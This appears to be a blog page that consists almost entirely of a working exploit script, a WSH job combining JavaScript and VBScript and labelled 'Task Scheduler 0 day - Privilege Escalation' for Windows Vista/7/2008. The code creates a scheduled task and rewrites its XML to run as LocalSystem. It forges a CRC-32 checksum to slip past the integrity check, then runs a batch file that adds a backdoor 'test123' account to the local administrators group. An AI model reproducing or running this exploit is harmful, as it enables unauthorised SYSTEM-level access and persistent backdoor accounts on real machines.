Blog

  

<job id="tasksch-wD-0day">  

<script language="Javascript">  

   

crc_table = new Array(  

  0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419,  

  0x706AF48F, 0xE963A535, 0x9E6495A3, 0x0EDB8832, 0x79DCB8A4,  

  0xE0D5E91E, 0x97D2D988, 0x09B64C2B, 0x7EB17CBD, 0xE7B82D07,  

  0x90BF1D91, 0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE,  

  0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7, 0x136C9856,  

  0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9,  

  0xFA0F3D63, 0x8D080DF5, 0x3B6E20C8, 0x4C69105E, 0xD56041E4,  

  0xA2677172, 0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B,  

  0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940, 0x32D86CE3,  

  0x45DF5C75, 0xDCD60DCF, 0xABD13D59, 0x26D930AC, 0x51DE003A,  

  0xC8D75180, 0xBFD06116, 0x21B4F4B5, 0x56B3C423, 0xCFBA9599,  

  0xB8BDA50F, 0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924,  

  0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D, 0x76DC4190,  

  0x01DB7106, 0x98D220BC, 0xEFD5102A, 0x71B18589, 0x06B6B51F,  

  0x9FBFE4A5, 0xE8B8D433, 0x7807C9A2, 0x0F00F934, 0x9609A88E,  

  0xE10E9818, 0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01,  

  0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E, 0x6C0695ED,  

  0x1B01A57B, 0x8208F4C1, 0xF50FC457, 0x65B0D9C6, 0x12B7E950,  

  0x8BBEB8EA, 0xFCB9887C, 0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3,  

  0xFBD44C65, 0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2,  

  0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB, 0x4369E96A,  

  0x346ED9FC, 0xAD678846, 0xDA60B8D0, 0x44042D73, 0x33031DE5,  

  0xAA0A4C5F, 0xDD0D7CC9, 0x5005713C, 0x270241AA, 0xBE0B1010,  

  0xC90C2086, 0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F,  

  0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4, 0x59B33D17,  

  0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD, 0xEDB88320, 0x9ABFB3B6,  

  0x03B6E20C, 0x74B1D29A, 0xEAD54739, 0x9DD277AF, 0x04DB2615,  

  0x73DC1683, 0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8,  

  0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1, 0xF00F9344,  

  0x8708A3D2, 0x1E01F268, 0x6906C2FE, 0xF762575D, 0x806567CB,  

  0x196C3671, 0x6E6B06E7, 0xFED41B76, 0x89D32BE0, 0x10DA7A5A,  

  0x67DD4ACC, 0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5,  

  0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252, 0xD1BB67F1,  

  0xA6BC5767, 0x3FB506DD, 0x48B2364B, 0xD80D2BDA, 0xAF0A1B4C,  

  0x36034AF6, 0x41047A60, 0xDF60EFC3, 0xA867DF55, 0x316E8EEF,  

  0x4669BE79, 0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236,  

  0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F, 0xC5BA3BBE,  

  0xB2BD0B28, 0x2BB45A92, 0x5CB36A04, 0xC2D7FFA7, 0xB5D0CF31,  

  0x2CD99E8B, 0x5BDEAE1D, 0x9B64C2B0, 0xEC63F226, 0x756AA39C,  

  0x026D930A, 0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713,  

  0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38, 0x92D28E9B,  

  0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21, 0x86D3D2D4, 0xF1D4E242,  

  0x68DDB3F8, 0x1FDA836E, 0x81BE16CD, 0xF6B9265B, 0x6FB077E1,  

  0x18B74777, 0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C,  

  0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45, 0xA00AE278,  

  0xD70DD2EE, 0x4E048354, 0x3903B3C2, 0xA7672661, 0xD06016F7,  

  0x4969474D, 0x3E6E77DB, 0xAED16A4A, 0xD9D65ADC, 0x40DF0B66,  

  0x37D83BF0, 0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9,  

  0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6, 0xBAD03605,  

  0xCDD70693, 0x54DE5729, 0x23D967BF, 0xB3667A2E, 0xC4614AB8,  

  0x5D681B02, 0x2A6F2B94, 0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B,  

  0x2D02EF8D  

);  

   

var hD='0123456789ABCDEF';  

   

function dec2hex(d) {  

h='';  

for (i=0;i<8;i++) {  

h = hD.charAt(d&15)+h;  

d >>>= 4;  

}  

return h;  

}  

function encodeToHex(str){  

  var r="";  

  var e=str.length;  

  var c=0;  

  var h;  

  while(c<e){  

  h=str.charCodeAt(c++).toString(16);  

  while(h.length<3) h="0"+h;  

  r+=h;  

  }  

  return r;  

}  

function decodeFromHex(str){  

  var r="";  

  var e=str.length;  

  var s=0;  

  while(e>1){  

   

  r=r+String.fromCharCode("0x"+str.substring(s,s+2));  

   

  s=s+2;  

  e=e-2;  

  }  

   

  return r;  

   

}  

   

   

function calc_crc(anyForm) {  

   

anyTextString=decodeFromHex(anyForm);  

   

Crc_value = 0xFFFFFFFF;  

StringLength=anyTextString.length;  

for (i=0; i<StringLength; i++) {  

tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF;  

Table_value = crc_table[tableIndex];  

Crc_value >>>= 8;  

Crc_value ^= Table_value;  

}  

Crc_value ^= 0xFFFFFFFF;  

return dec2hex(Crc_value);  

   

}  

   

function rev_crc(leadString,endString,crc32) {  

//  

// First, we calculate the CRC-32 for the initial string  

//  

  anyTextString=decodeFromHex(leadString);  

   

  Crc_value = 0xFFFFFFFF;  

  StringLength=anyTextString.length;  

  //document.write(alert(StringLength));  

  for (var i=0; i<StringLength; i++) {  

  tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF;  

  Table_value = crc_table[tableIndex];  

  Crc_value >>>= 8;  

  Crc_value ^= Table_value;  

  }  

//  

// Second, we calculate the CRC-32 without the final string  

//  

  crc=parseInt(crc32,16);  

  crc ^= 0xFFFFFFFF;  

  anyTextString=decodeFromHex(endString);  

  StringLength=anyTextString.length;  

  for (var i=0; i<StringLength; i++) {  

  tableIndex=0;  

  Table_value = crc_table[tableIndex];  

  while (((Table_value ^ crc) >>> 24) & 0xFF) {  

  tableIndex++;  

  Table_value = crc_table[tableIndex];  

  }  

  crc ^= Table_value;  

  crc <<= 8;  

  crc |= tableIndex ^ anyTextString.charCodeAt(StringLength - i -1);  

  }  

//  

// Now let's find the 4-byte string  

//  

  for (var i=0; i<4; i++) {  

  tableIndex=0;  

  Table_value = crc_table[tableIndex];  

  while (((Table_value ^ crc) >>> 24) & 0xFF) {  

  tableIndex++;  

  Table_value = crc_table[tableIndex];  

  }  

  crc ^= Table_value;  

  crc <<= 8;  

  crc |= tableIndex;  

  }  

  crc ^= Crc_value;  

//  

// Finally, display the results  

//  

  var TextString=dec2hex(crc);  

  var Teststring='';  

Teststring=TextString.substring(6,8);  

Teststring+=TextString.substring(4,6);  

Teststring+=TextString.substring(2,4);  

Teststring+=TextString.substring(0,2);  

  return Teststring  

}  

function decodeFromHex(str){  

  var r="";  

  var e=str.length;  

  var s=0;  

  while(e>1){  

   

  r=r+String.fromCharCode("0x"+str.substring(s,s+2));  

   

  s=s+2;  

  e=e-2;  

  }  

   

  return r;  

   

}  

</script>  

   

   

   

<script language="VBScript">  

dim output  

set output = wscript.stdout  

output.writeline " Task Scheduler 0 day - Privilege Escalation "  

output.writeline " Should work on Vista/Win7/2008 x86/x64"  

output.writeline " webDEViL - w3bd3vil [at] gmail [dot] com" & vbCr & vbLf  

biatchFile = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2)+"\xpl.bat"  

Set objShell = CreateObject("WScript.Shell")  

objShell.Run "schtasks /create /TN wDw00t /sc monthly /tr """+biatchFile+"""",,True  

   

Set fso = CreateObject("Scripting.FileSystemObject")  

Set a = fso.CreateTextFile(biatchFile, True)  

a.WriteLine ("net user /add test123 test123")  

a.WriteLine ("net localgroup administrators /add test123")  

a.WriteLine ("schtasks /delete /f /TN wDw00t")  

   

Function ReadByteArray(strFileName)  

Const adTypeBinary = 1  

Dim bin  

  Set bin = CreateObject("ADODB.Stream")  

  bin.Type = adTypeBinary  

  bin.Open  

  bin.LoadFromFile strFileName  

  ReadByteArray = bin.Read  

'output.writeline ReadByteArray  

End Function  

   

Function OctetToHexStr (arrbytOctet)  

  Dim k  

  OctetToHexStr = ""  

  For k = 3 To Lenb (arrbytOctet)  

  OctetToHexStr = OctetToHexStr _  

  & Right("0" & Hex(Ascb(Midb(arrbytOctet, k, 1))), 2)  

  Next  

  End Function  

strFileName="C:\windows\system32\tasks\wDw00t"  

   

hexXML = OctetToHexStr (ReadByteArray(strFileName))  

'output.writeline hexXML  

crc32 = calc_crc(hexXML)  

output.writeline "Crc32 Original: "+crc32  

   

   

Set xmlDoc = CreateObject("Microsoft.XMLDOM")  

'permissions workaround  

'objShell.Run "cmd /c copy C:\windows\system32\tasks\wDw00t .",,True  

'objShell.Run "cmd /c schtasks /query /XML /TN wDw00t > wDw00t.xml",,True  

Set objShell = WScript.CreateObject("WScript.Shell")  

Set objExecObject = objShell.Exec("cmd /c schtasks /query /XML /TN wDw00t")  

   

Do Until objExecObject.StdOut.AtEndOfStream  

  strLine = strLine & objExecObject.StdOut.ReadLine()  

Loop  

hexXML = "FFFE3C00"+OctetToHexStr(strLine)  

'output.writeline hexXML  

Set ts = fso.createtextfile ("wDw00t.xml")  

For n = 1 To (Len (hexXML) - 1) step 2  

  ts.write Chr ("&h" & Mid (hexXML, n, 2))  

Next  

ts.close  

   

xmlDoc.load "wDw00t.xml"  

Set Author = xmlDoc.selectsinglenode ("//Task/RegistrationInfo/Author")  

Author.text = "LocalSystem"  

Set UserId = xmlDoc.selectsinglenode ("//Task/Principals/Principal/UserId")  

UserId.text = "S-1-5-18"  

xmldoc.save(strFileName)  

   

hexXML = OctetToHexStr (ReadByteArray(strFileName))  

   

leadString=hexXML+"3C0021002D002D00"  

endString="2D002D003E00"  

'output.writeline leadString  

impbytes=rev_crc(leadString,endString,crc32)  

output.writeline "Crc32 Magic Bytes: "+impbytes  

   

finalString = leadString+impbytes+endString  

forge = calc_crc(finalString)  

output.writeline "Crc32 Forged: "+forge  

   

strHexString="FFFE"+finalString  

Set fso = CreateObject ("scripting.filesystemobject")  

Set stream = CreateObject ("adodb.stream")  

   

Set ts = fso.createtextfile (strFileName)  

   

For n = 1 To (Len (strHexString) - 1) step 2  

  ts.write Chr ("&h" & Mid (strHexString, n, 2))  

Next  

ts.close  

   

   

Set objShell = CreateObject("WScript.Shell")  

objShell.Run "schtasks /change /TN wDw00t /disable",,True  

objShell.Run "schtasks /change /TN wDw00t /enable",,True  

objShell.Run "schtasks /run /TN wDw00t",,True  

   

</script>  

</job>